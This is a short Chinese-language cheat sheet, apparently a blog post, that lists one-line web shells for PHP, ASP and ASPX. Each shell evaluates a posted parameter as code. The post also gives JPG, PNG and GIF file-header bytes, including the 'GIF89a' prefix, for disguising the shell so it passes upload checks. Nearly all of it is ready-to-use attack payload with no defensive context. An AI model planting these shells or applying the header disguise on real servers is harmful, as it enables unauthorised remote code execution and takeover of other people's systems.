普通一句话木马:<?php @eval($_POST[‘mio’]) ?>
php的一句话木马: <?php @eval($_POST[‘pass’]);?>
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是:
<%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>
有时需要文件头伪装才能成功上传
jpg文件头:FF D8 FF E0 00 10 4A 46 49 46
png文件头:89 50 4E 47 0D 0A 1A 0A
GIF文件头:47 49 46 38 39 61
以上在HEX中修改,
当然gif也可以直接写在文件头:GIF89a
发表回复